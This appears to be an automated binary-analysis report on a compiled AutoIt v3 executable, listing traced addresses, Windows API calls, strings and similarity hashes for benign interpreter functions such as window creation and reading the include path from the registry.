0x00000000
0x00000000
0x00abbf1f
0x00af3629
0x00af362f
0x00af3633
0x00af3636
0x00af3638
0x00af363a
0x00000000
0x00000000
0x00af363c
0x00af363e
0x00000000
0x00000000
0x00af3640
0x00af3640
0x00af3641
0x00af3641
0x00af3645
0x00af3649
0x00000000
0x00af3649
0x00abbcea
0x00abbcf1
0x00af36a6
0x00af36ad
0x00000000
0x00000000
0x00af36b5
0x00000000
0x00af36b5
0x00abbcf7
0x00abbcfe
0x00abbd58
0x00abbd5f
0x00abbe1d
0x00abbe24
0x00af38b5
0x00af38bc
0x00000000
0x00000000
0x00af38c4
0x00af38d8
0x00af38e3
0x00af38ee
0x00af38f2
0x00af38f9
0x00af3900
0x00af3907
0x00af3912
0x00af3917
0x00af3925
0x00af393c
0x00af394b
0x00af394d
0x00af3951
0x00af3955
0x00af395a
0x00af3960
0x00af3965
0x00af3969
0x00af396d
0x00af3ad3
0x00af3ad6
0x00af3adf
0x00af3ae4
0x00af3ae8
0x00af3af0
0x00af3af4
0x00af3d2e
0x00af3d3a
0x00af3d48
0x00af3d63
0x00af3d6f
0x00af3d83
0x00af3d8d
0x00af3d92
0x00af3d99
0x00af3d9b
0x00af3d9e
0x00af3da3
0x00af3da3
0x00af3dae
0x00af3db5
0x00af3db8
0x00af3f06
0x00af3f0d
0x00af3f18
0x00af3f23
0x00af3f2f
0x00af3f34
0x00000000
0x00af3dbe
0x00af3dbe
0x00af3dc1
0x00af3dc4
0x00000000
0x00000000
0x00af3dca
0x00000000
0x00af3ebb
0x00af3ebd
0x00af3ec0
0x00af3ec2
0x00af3ec2
0x00000000
0x00000000
0x00000000
0x00000000
0x00af3ea5
0x00af3ea7
0x00000000
0x00000000
0x00af3ea9
0x00af3eaa
0x00000000
0x00000000
0x00af3eb2
0x00af3eb4
0x00000000
0x00000000
0x00af3eb6
0x00af3eb6
0x00000000
0x00000000
0x00af3ecc
0x00000000
0x00000000
0x00af3ed6
0x00af3ed8
0x00af3edb
0x00af3edd
0x00af3edd
0x00000000
0x00000000
0x00af3ef2
0x00af3ef4
0x00000000
0x00000000
0x00af3ef6
0x00af3ef8
0x00af3ef8
0x00af3efd
0x00af3efe
0x00000000
0x00000000
0x00af3ee4
0x00af3ee6
0x00af3ee9
0x00af3eeb
0x00af3eeb
0x00000000
0x00000000
0x00af3dca
0x00000000
0x00000000
0x00000000
0x00af3afa
0x00af3afa
0x00af3afe
0x00af3b00
0x00af3b04
0x00af3b07
0x00af3b0b
0x00af3b0e
0x00af3b12
0x00af3b3b
0x00af3b3b
0x00af3b3f
0x00af3b46
0x00af3b4e
0x00af3b4e
0x00af3b50
0x00af3b54
0x00af3b57
0x00af3b5b
0x00af3b5f
0x00000000
0x00000000
0x00af3b61
0x00af3b61
0x00af3c42
0x00af3c42
0x00af3c43
0x00af3b57
0x00af3b5b
0x00af3b5f
0x00000000
0x00000000
0x00000000
0x00af3b67
0x00af3b67
0x00af3b6b
0x00af3c34
0x00af3c38
0x00000000
0x00000000
0x00af3c3a
0x00af3c3c
0x00af3b78
0x00af3b7f
0x00af3b83
0x00af3b87
0x00af3b8b
0x00af3b8f
0x00af3b93
0x00af3cef
0x00af3cef
0x00af3d03
0x00000000
0x00af3d03
0x00af3b9c
0x00af3ba4
0x00af3bb0
0x00af3bbd
0x00af3bcf
0x00af3bd4
0x00af3bd6
0x00af3dd1
0x00af3dd5
0x00af3dd7
0x00af3dda
0x00af3ddf
0x00af3ddf
0x00af3de7
0x00af3deb
0x00af3dee
0x00af3a84
0x00af3a84
0x00af3a8c
0x00af3a94
0x00af3a9b
0x00af3aa7
0x00af3aac
0x00af3ab3
0x00af3ab8
0x00000000
0x00af3df4
0x00af3df4
0x00af3df7
0x00af3dfa
0x00000000
0x00000000
0x00af3e00
0x00000000
0x00af3e37
0x00af3e3b
0x00af3e3d
0x00af3e44
0x00af3e44
0x00000000
0x00000000
0x00000000
0x00000000
0x00af3e07
0x00af3e0b
0x00af3e0d
0x00000000
0x00000000
0x00af3e13
0x00af3e14
0x00af3e1a
0x00000000
0x00000000
0x00af3e23
0x00af3e27
0x00af3e29
0x00000000
0x00000000
0x00af3e2f
0x00af3e2f
0x00000000
0x00000000
0x00af3e55
0x00af3e5d
0x00000000
0x00000000
0x00af3e66
0x00af3e6a
0x00af3e6c
0x00af3e73
0x00af3e73
0x00000000
0x00000000
0x00af3e94
0x00af3e98
0x00af3e9a
0x00000000
0x00000000
0x00af3a74
0x00af3a76
0x00af3a76
0x00af3a7b
0x00af3a7c
0x00af3a7c
0x00af3a81
0x00000000
0x00000000
0x00af3e7d
0x00af3e81
0x00af3e83
0x00af3e8a
0x00af3e8a
0x00000000
0x00000000
0x00af3e00
0x00af3dee
0x00af3bf9
0x00af3bfe
0x00af3c02
0x00af3c04
0x00af3c07
0x00af3c0c
0x00af3c0c
0x00af3c14
0x00af3c18
0x00af3c1b
0x00af3cd9
0x00af3cd9
0x00af3ce1
0x00000000
0x00af3c21
0x00af3c21
0x00af3c24
0x00af3c27
0x00000000
0x00000000
0x00af3c2d
0x00000000
0x00af3c75
0x00af3c79
0x00af3c7b
0x00af3c7e
0x00af3c7e
0x00000000
0x00000000
0x00000000
0x00000000
0x00af3c4b
0x00af3c4f
0x00af3c51
0x00000000
0x00000000
0x00af3c57
0x00af3c58
0x00af3c5e
0x00000000
0x00000000
0x00af3c64
0x00af3c68
0x00af3c6c
0x00af3c6e
0x00000000
0x00000000
0x00af3c70
0x00af3c70
0x00000000
0x00000000
0x00af3c8c
0x00af3c94
0x00000000
0x00000000
0x00af3c9a
0x00af3c9e
0x00af3ca0
0x00af3ca3
0x00af3ca3
0x00000000
0x00000000
0x00af3cba
0x00af3cbe
0x00af3cc2
0x00af3cc4
0x00000000
0x00000000
0x00af3cc6
0x00af3cc8
0x00af3cc8
0x00af3ccd
0x00af3cd1
0x00af3cd1
0x00af3cd6
0x00000000
0x00000000
0x00af3caa
0x00af3cae
0x00af3cb0
0x00af3cb3
0x00af3cb3
0x00000000
0x00000000
0x00af3c2d
0x00af3c1b
0x00000000
0x00af3c3c
0x00af3b71
0x00af3b71
0x00af3b72
0x00000000
0x00000000
0x00000000
0x00af3b72
0x00000000
0x00000000
0x00000000
0x00af3b14
0x00af3b14
0x00af3b17
0x00af3b19
0x00af3b1c
0x00af3b28
0x00af3b28
0x00af3b28
0x00000000
0x00af3b28
0x00af3b1e
0x00af3b21
0x00000000
0x00000000
0x00af3b23
0x00000000
0x00af3b29
0x00af3b29
0x00af3b2c
0x00af3b2c
0x00af3b33
0x00af3b37
0x00000000
0x00af3d08
0x00af3d11
0x00af3d16
0x00af3d1c
0x00af3d1d
0x00af3d21
0x00af3d25
0x00af3d25
0x00000000
0x00af3afa
0x00af397a
0x00af397a
0x00af397d
0x00af3981
0x00af3981
0x00af3984
0x00af3988
0x00af398b
0x00af3990
0x00000000
0x00000000
0x00af3992
0x00af3996
0x00af3999
0x00af3999
0x00af399d
0x00af39a2
0x00af39b7
0x00af39ba
0x00af39bc
0x00af39bf
0x00000000
0x00000000
0x00af39c1
0x00af39c4
0x00af3a56
0x00af3a6d
0x00000000
0x00af3a6d
0x00000000
0x00af39c4
0x00af39ab
0x00af39ad
0x00000000
0x00000000
0x00af39b3
0x00000000
0x00af39ca
0x00af39ca
0x00af39ce
0x00af39cf
0x00af39cf
0x00af39d6
0x00af39da
0x00af39da
0x00af39de
0x00af39df
0x00af39e4
0x00af3a0a
0x00af3a13
0x00af3a1f
0x00af3a20
0x00af3a24
0x00af3a29
0x00af3a2c
0x00af3a33
0x00af3a37
0x00af3a3a
0x00af3acb
0x00af3acf
0x00000000
0x00af3acf
0x00af3a40
0x00af3981
0x00af3984
0x00af3988
0x00af398b
0x00af3990
0x00000000
0x00000000
0x00000000
0x00af3990
0x00af39e6
0x00af39ea
0x00af39eb
0x00af39eb
0x00af39ed
0x00af39f0
0x00af39f4
0x00af39f8
0x00000000
0x00000000
0x00af39fa
0x00af39fa
0x00af3a53
0x00af3a53
0x00af39f0
0x00af39f4
0x00af39f8
0x00000000
0x00000000
0x00000000
0x00af39fd
0x00af39fd
0x00af3a01
0x00af3a49
0x00af3a4d
0x00000000
0x00000000
0x00af3a4f
0x00af3a51
0x00af3a06
0x00af3a06
0x00000000
0x00af3a06
0x00000000
0x00af3a51
0x00af3a03
0x00af3a03
0x00af3a04
0x00000000
0x00000000
0x00000000
0x00af3a04
0x00af39ed
0x00af3981
0x00abbe2a
0x00abbe31
0x00af3f40
0x00af3f47
0x00000000
0x00000000
0x00af3f54
0x00af3f59
0x00af3f66
0x00af3f6b
0x00af3f6d
0x00000000
0x00000000
0x00af3f73
0x00af3f7b
0x00000000
0x00000000
0x00af3f8c
0x00af3f8e
0x00af3f90
0x00000000
0x00000000
0x00af3f99
0x00af3fa4
0x00af3faf
0x00af3fba
0x00af3fd2
0x00af3fdd
0x00af3fe4
0x00af4000
0x00af400c
0x00af4011
0x00af4023
0x00af402f
0x00af4036
0x00af4042
0x00000000
0x00af4042
0x00af404c
0x00af4053
0x00af4053
0x00abbe37
0x00abbe37
0x00abbe40
0x00af4065
0x00af406b
0x00af4072
0x00af4077
0x00000000
0x00000000
0x00af408b
0x00af4097
0x00af40a4
0x00af40c3
0x00af40c3
0x00af40d0
0x00abc30e
0x00abc30e
0x00abc315
0x00000000
0x00abc315
0x00abbe49
0x00abc210
0x00abc212
0x00abc218
0x00abc21f
0x00abc242
0x00abc242
0x00abc248
0x00abc24b
0x00000000
0x00000000
0x00af428b
0x00af428e
0x00af4291
0x00000000
0x00af4297
0x00af4297
0x00000000
0x00af42c9
0x00af42cb
0x00000000
0x00000000
0x00af42b2
0x00af42b4
0x00000000
0x00000000
0x00af42a0
0x00af42d0
0x00af42d0
0x00af42d2
0x00af42d4
0x00000000
0x00000000
0x00000000
0x00000000
0x00af42a7
0x00af42a9
0x00af42b9
0x00af42b9
0x00af42bb
0x00af42bd
0x00af42d6
0x00af42e2
0x00af42e4
0x00af42e9
0x00af42ee
0x00af42fe
0x00af4303
0x00af4305
0x00af4305
0x00000000
0x00000000
0x00af430b
0x00af430d
0x00af4388
0x00af438e
0x00af4395
0x00af439f
0x00000000
0x00af439f
0x00af430f
0x00af430f
0x00af4315
0x00af4318
0x00af431f
0x00af432c
0x00af4337
0x00af4342
0x00af434f
0x00af435d
0x00af436b
0x00af4375
0x00af4377
0x00af4383
0x00000000
0x00af4383
0x00af431a
0x00af431d
0x00000000
0x00000000
0x00000000
0x00af431d
0x00af42bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00af4297
0x00000000
0x00af4291
0x00abc221
0x00abc227
0x00abc22c
0x00abc22e
0x00000000
0x00000000
0x00abc230
0x00abc301
0x00abc301
0x00abc308
0x00abc391
0x00000000
0x00abc391
0x00000000
0x00abc308
0x00abc236
0x00abc23c
0x00000000
0x00000000
0x00000000
0x00abc23c
0x00abbe52
0x00af43ab
0x00af43b1
0x00af43b8
0x00af43e6
0x00af43e6
0x00af43ec
0x00af43ee
0x00af43f3
0x00af43f7
0x00af43fa
0x00af4424
0x00af4427
0x00000000
0x00000000
0x00af442d
0x00af442d
0x00af4433
0x00af4438
0x00af443c
0x00af443e
0x00af4486
0x00af4486
0x00af448d
0x00af44c1
0x00af44c3
0x00af448f
0x00af448f
0x00af4493
0x00af4497
0x00af4499
0x00af449b
0x00af449b
0x00af44a1
0x00af44a9
0x00af44b2
0x00af44b2
0x00af44ce
0x00af44d5
0x00af44df
0x00000000
0x00af44df
0x00af4446
0x00af444c
0x00af4454
0x00af446c
0x00af4472
0x00af4478
0x00af447c
0x00000000
0x00af447c
0x00af445e
0x00af4464
0x00af4466
0x00000000
0x00000000
0x00000000
0x00af4466
0x00af4407
0x00af440b
0x00af4410
0x00af4413
0x00af4418
0x00000000
0x00000000
0x00af441e
0x00000000
0x00af441e
0x00af43ba
0x00af43c0
0x00af43c5
0x00af43c7
0x00000000
0x00000000
0x00af43c9
0x00af43d3
0x00af43d3
0x00af43d9
0x00af43db
0x00af40ab
0x00af40b1
0x00af40b1
0x00af40bb
0x00000000
0x00af40bb
0x00af43cb
0x00af43d1
0x00000000
0x00000000
0x00000000
0x00abbe61
0x00abbe64
0x00000000
0x00abbe85
0x00abbe85
0x00abbe88
0x00abbe90
0x00abbe98
0x00abbe9a
0x00abbea0
0x00af40da
0x00000000
0x00af40da
0x00abbea9
0x00abbeb0
0x00abbeb4
0x00abbeb8
0x00abbebc
0x00abbebe
0x00abbec2
0x00abbec6
0x00abbeca
0x00abbed0
0x00abbfa9
0x00abbfac
0x00abbfbb
0x00abbfbc
0x00abbfbf
0x00af41aa
0x00af41b9
0x00abc1e0
0x00abc1e0
0x00abc1e2
0x00abc1aa
0x00abc1b1
0x00abc1b4
0x00abc1b9
0x00abbee2
0x00abbee2
0x00abbee8
0x00abc1ec
0x00abc1f1
0x00abc1f4
0x00af41e1
0x00af41ec
0x00af41f1
0x00af41f1
0x00abc1fb
0x00abc200
0x00abc203
0x00abc203
0x00abbeee
0x00abbef2
0x00abbef6
0x00abbefa
0x00abbefd
0x00abc35f
0x00abc362
0x00abc365
0x00000000
0x00000000
0x00abc36b
0x00000000
0x00af421b
0x00af421d
0x00af4224
0x00af4226
0x00af4226
0x00000000
0x00000000
0x00000000
0x00000000
0x00af41f9
0x00af41fb
0x00000000
0x00000000
0x00af4201
0x00af4202
0x00af4208
0x00000000
0x00000000
0x00af420e
0x00af4210
0x00000000
0x00000000
0x00af4216
0x00000000
0x00000000
0x00af4233
0x00af423b
0x00000000
0x00000000
0x00af4241
0x00af4243
0x00af424a
0x00af424c
0x00af424c
0x00000000
0x00000000
0x00af426b
0x00af426d
0x00000000
0x00000000
0x00af4273
0x00af4275
0x00af4275
0x00af427a
0x00af427e
0x00af427e
0x00af4283
0x00000000
0x00000000
0x00af4256
0x00af4258
0x00af425f
0x00af4261
0x00af4261
0x00000000
0x00000000
0x00abc36b
0x00abbf03
0x00abbf03
0x00abbf0b
0x00000000
0x00abbf0b
0x00af41cc
0x00af41d5
0x00000000
0x00af41d5
0x00000000
0x00abc1e4
0x00abbfc5
0x00abbfcc
0x00000000
0x00abbfd3
0x00abbfd7
0x00abbfdf
0x00abbfe3
0x00abbfe7
0x00abbfeb
0x00abbff1
0x00abbff5
0x00abbffa
0x00abbffe
0x00abc000
0x00abc27c
0x00abc281
0x00abc286
0x00abc28c
0x00abc28e
0x00abc29c
0x00abc2a1
0x00abc2a6
0x00abc2a6
0x00abc006
0x00abc00c
0x00af40ff
0x00af4103
0x00af4108
0x00000000
0x00abc012
0x00abc023
0x00abc040
0x00abc045
0x00abc047
0x00af4115
0x00000000
0x00af4115
0x00abc04d
0x00abc058
0x00abc064
0x00abc067
0x00af4138
0x00af4140
0x00af4149
0x00000000
0x00af4149
0x00abc074
0x00abc080
0x00abc083
0x00000000
0x00000000
0x00abc08d
0x00abc094
0x00abc09c
0x00abc0a4
0x00abc0a7
0x00abc0ab
0x00abc0ad
0x00abc0b1
0x00abc379
0x00abc379
0x00abc0b7
0x00abc0be
0x00abc0c2
0x00abc0c5
0x00abc381
0x00abc381
0x00abc0cb
0x00abc0d4
0x00abc0d6
0x00abc0da
0x00abc0de
0x00af4122
0x00abc0e4
0x00abc0e4
0x00abc0e4
0x00abc0e7
0x00abc0ea
0x00abc0ef
0x00abc0f3
0x00abc0fa
0x00abc101
0x00abc105
0x00abc108
0x00abc389
0x00abc389
0x00abc118
0x00abc11c
0x00abc121
0x00abc12e
0x00abc133
0x00abc13d
0x00abc13f
0x00abc141
0x00af412e
0x00000000
0x00abc147
0x00abc147
0x00abc149
0x00abc151
0x00abc155
0x00abc192
0x00abc196
0x00abc19e
0x00abc1a3
0x00abc1a7
0x00000000
0x00abc1a7
0x00abc160
0x00abc160
0x00abc164
0x00abc167
0x00abc16b
0x00abc16d
0x00abc16f
0x00abc178
0x00abc17d
0x00abc181
0x00abc181
0x00abc184
0x00abc18b
0x00abc18c
0x00abc18c
0x00000000
0x00abc160
0x00abc141
0x00000000
0x00abc1c4
0x00abc1cb
0x00abc1d3
0x00abc1db
0x00000000
0x00000000
0x00af4153
0x00af415e
0x00af4160
0x00af4165
0x00af4167
0x00af418c
0x00af4198
0x00af419c
0x00af41a0
0x00000000
0x00af41a0
0x00af4169
0x00af416d
0x00af4179
0x00af417e
0x00af4182
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00abbfcc
0x00abbfb1
0x00000000
0x00abbfb1
0x00abbedd
0x00000000
0x00abbedd
0x00abbe64
0x00abbd72
0x00abbd72
0x00abbd79
0x00abbd81
0x00abbd91
0x00abbd9c
0x00abbda6
0x00abbdae
0x00abbdb5
0x00abbdb7
0x00abbdbc
0x00abbdc1
0x00abbdc6
0x00abc372
0x00abbdcc
0x00abbdcc
0x00abbdcc
0x00abbdd2
0x00abbde0
0x00af36e2
0x00af36ee
0x00af36f1
0x00af36f6
0x00af36fb
0x00af3700
0x00af3702
0x00af3705
0x00af3707
0x00af3707
0x00af370c
0x00af3714
0x00af371e
0x00000000
0x00af3724
0x00af372b
0x00af3733
0x00af3735
0x00af3737
0x00000000
0x00000000
0x00af3741
0x00af3749
0x00af3751
0x00af3759
0x00af3771
0x00af377c
0x00af3780
0x00af3799
0x00af37a5
0x00af37ae
0x00af37c6
0x00af37d1
0x00af37d5
0x00af37ee
0x00af37fa
0x00af3803
0x00af381b
0x00af3826
0x00af382a
0x00af3843
0x00af384f
0x00af3854
0x00af3866
0x00af386f
0x00af3876
0x00af3882
0x00000000
0x00af3882
0x00af371e
0x00abbdf4
0x00af388c
0x00af3893
0x00af38a8
0x00af38a8
0x00af38aa
0x00af38aa
0x00000000
0x00af38aa
0x00af3895
0x00af389c
0x00000000
0x00000000
0x00af389e
0x00af38a4
0x00000000
0x00af38a4
0x00abbdfa
0x00abbdfa
0x00abbe01
0x00abbe03
0x00abbe0c
0x00abbe15
0x00abbe1a
0x00abbe1a
0x00abbe03
0x00000000
0x00abbd79
0x00abbd09
0x00abbd09
0x00abbd15
0x00abbd1c
0x00abbd24
0x00000000
0x00abbd28
0x00abbd2a
0x00000000
0x00abbd30
0x00abbd30
0x00abbd30
0x00abbd30
0x00abbd34
0x00abbd34
0x00abbd34
0x00abbd36
0x00abbd36
0x00abbd36
0x00abbd3c
0x00000000
0x00000000
0x00abbf95
0x00abbf97
0x00abbf9b
0x00af36d5
0x00af36d8
0x00abbd34
0x00abbd34
0x00000000
0x00abbd34
0x00abbfa1
0x00abbfa1
0x00abbd42
0x00abbd46
0x00abbd4f
0x00000000
0x00abbd55
0x00abbd55
0x00abbd55
0x00000000
0x00abbd55
0x00abbd4f
0x00abbf4c
0x00abbf4c
0x00abbf4e
0x00abbf52
0x00abbf8d
0x00abbf8d
0x00000000
0x00abbf8d
0x00abbf54
0x00abbf57
0x00abbf5d
0x00abbf5f
0x00abbf61
0x00abbf63
0x00abbf69
0x00af36c0
0x00af36c6
0x00abbf78
0x00abbf78
0x00abbf7a
0x00abbf7c
0x00000000
0x00000000
0x00abbf7e
0x00abc324
0x00abc324
0x00abc332
0x00abc337
0x00abc342
0x00abc349
0x00abc34f
0x00abc356
0x00000000
0x00abc356
0x00abbf84
0x00abbf87
0x00000000
0x00000000
0x00000000
0x00abbf87
0x00abbf77
0x00abbf77
0x00000000
0x00abbf77
0x00abbf6f
0x00abbf75
0x00000000
0x00000000
0x00000000
0x00abbf75
0x00abbcfe
0x00000000
0x00abbcc0

APIs

timeGetTime.WINMM ref: 00ABBF57

Part of subcall function 00AB52B0: PeekMessageW.USER32 ref: 00AB52E6

Sleep.KERNEL32(0000000A,?,?), ref: 00AF36B5

Strings

@GUI_CTRLID, xrefs: 00AF376C
@COM_EVENTOBJ, xrefs: 00AF3D2E
@GUI_WINHANDLE, xrefs: 00AF37C1
@GUI_CTRLHANDLE, xrefs: 00AF3816
CALL, xrefs: 00ABC277
@TRAY_ID, xrefs: 00AF3FCD

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: e9a8d598f1a932b6486ed1c453c8917df101ec9249b22566def178b375e1357f
Instruction ID: c91bacf2a78b547553b7ed7f27bcd8336107ff73e41cc35869e184892ddae3d3
Opcode Fuzzy Hash: e9a8d598f1a932b6486ed1c453c8917df101ec9249b22566def178b375e1357f
Instruction Fuzzy Hash: 1FC2C071608341DFDB24DF64C984BBABBE4BF84304F14491DF58A972A2CB71E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2BA9, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD0FE6: _malloc.LIBCMT ref: 00AD0FFE

SystemParametersInfoW.USER32 ref: 00AB2C8C
GetSystemMetrics.USER32 ref: 00AB2C94
SystemParametersInfoW.USER32 ref: 00AB2CBF
GetSystemMetrics.USER32 ref: 00AB2CC7
GetSystemMetrics.USER32 ref: 00AB2CEC
SetRect.USER32 ref: 00AB2D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AB2D19
CreateWindowExW.USER32 ref: 00AB2D4C
SetWindowLongW.USER32 ref: 00AB2D60
GetClientRect.USER32 ref: 00AB2D7E
GetStockObject.GDI32(00000011), ref: 00AB2D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB2DA5

Part of subcall function 00AB2714: GetCursorPos.USER32(?,?,00B777B0,?,00B777B0,00B777B0,?,00B3C5FF,00000000,00000001,?,?,?,00AEBD40,?,?), ref: 00AB2727
Part of subcall function 00AB2714: ScreenToClient.USER32 ref: 00AB2744
Part of subcall function 00AB2714: GetAsyncKeyState.USER32(00000001), ref: 00AB2769
Part of subcall function 00AB2714: GetAsyncKeyState.USER32(00000002), ref: 00AB2777

SetTimer.USER32(00000000,00000000,00000028,00AB13C7), ref: 00AB2DCC

Strings

AutoIt v3 GUI, xrefs: 00AB2D44

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer_malloc
String ID: AutoIt v3 GUI
API String ID: 1557154100-248962490
Opcode ID: c400a711048285e12f09f5f3882e54ed35f329fe977a4dba6982d05438425a7f
Instruction ID: ac19277557155217bbe9614d06bb04f3f618c09ffcd2552c502a80b8e8aa3533
Opcode Fuzzy Hash: c400a711048285e12f09f5f3882e54ed35f329fe977a4dba6982d05438425a7f
Instruction Fuzzy Hash: D2B17D7564020A9FDB14DFA9CD99BEE7BB8FB08310F104129FA15A7290DB70E951CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3411, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AB3444
RegisterClassExW.USER32 ref: 00AB346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB347F
InitCommonControlsEx.COMCTL32(?), ref: 00AB349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB34AC
LoadIconW.USER32(000000A9), ref: 00AB34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB34D1

Strings

+, xrefs: 00AB342D
AutoIt v3 GUI, xrefs: 00AB3460
0, xrefs: 00AB3426
TaskbarCreated, xrefs: 00AB3474

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d86140cf64175676e580f1fcd9625d048561ed70cbb9c29b452d4645833dabf4
Instruction ID: da7927e1e1552c1e64a8f47d7f618343ec0855dd4007284ad8ba1213b6bf26c6
Opcode Fuzzy Hash: d86140cf64175676e580f1fcd9625d048561ed70cbb9c29b452d4645833dabf4
Instruction Fuzzy Hash: 1021E7B5954309AFDB00EF95EC48B9D7BF4FB09700F00411AF614A72A0DBB11680CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00AC29BE, Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00AD0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AC2A3E,?,00008000), ref: 00AD0BA7

Part of subcall function 00AD0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AC2A58,?,00008000), ref: 00AD02A4

SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00AC2ADF

Part of subcall function 00AD0FE6: _malloc.LIBCMT ref: 00AD0FFE

SetCurrentDirectoryW.KERNEL32(?), ref: 00AC2C2C

Part of subcall function 00AC3EBE: _wcscpy.LIBCMT ref: 00AC3EF6

Part of subcall function 00AD386D: _iswctype.LIBCMT ref: 00AD3875

Strings

Bad directive syntax error, xrefs: 00B0008F
Error opening the file, xrefs: 00AFFD33, 00AFFDAA
EA06, xrefs: 00AFFD48
Unterminated string, xrefs: 00B000D6
AU3!, xrefs: 00AC2A93
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00AFFD17

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_malloc_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 489323609-3738523708
Opcode ID: d33017edb7776178b1778048a92a92250a778cd453ef7ffa43b628fe300ace07
Instruction ID: f876a0fa5c0d7e4663a93ae7b35f4b265d87cd30d46ad8783c5f9cc82776c3e9
Opcode Fuzzy Hash: d33017edb7776178b1778048a92a92250a778cd453ef7ffa43b628fe300ace07
Instruction Fuzzy Hash: CF028E311083459FC724EF24C991FAFBBE5AF99354F10492DF59A932A2DB30DA49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2FC5, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00AC3094), ref: 00AD00ED

Part of subcall function 00AD08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AC309F), ref: 00AD08E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AC30E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B001BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B001FB
RegCloseKey.ADVAPI32(?), ref: 00B00239
_wcscat.LIBCMT ref: 00B00292

Strings

Include, xrefs: 00B001B1, 00B001F2
\, xrefs: 00B002B5
\Include\, xrefs: 00AC309F
Software\AutoIt v3\AutoIt, xrefs: 00AC30D8

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
